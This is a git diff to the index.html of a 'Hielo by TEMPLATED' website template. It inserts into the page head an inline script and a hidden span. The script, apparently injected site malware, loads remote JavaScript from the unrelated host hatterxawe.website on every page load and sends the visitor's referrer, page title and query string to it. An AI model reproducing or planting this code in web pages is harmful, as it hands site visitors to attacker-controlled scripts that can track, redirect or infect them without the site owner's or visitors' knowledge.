--- a/index.html
+++ b/index.html
@@ -6,7 +6,16 @@
 -->
 <html>
 	<head>
-		
+		<span id="faa34efd-8a16-a013-6a1c-72df0b57dda8"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1&_cid=faa34efd-8a16-a013-6a1c-72df0b57dda8'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && 'https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
 		<title>Hielo by TEMPLATED</title>
 		<meta charset="utf-8" />
 		<meta name="viewport" content="width=device-width, initial-scale=1" />
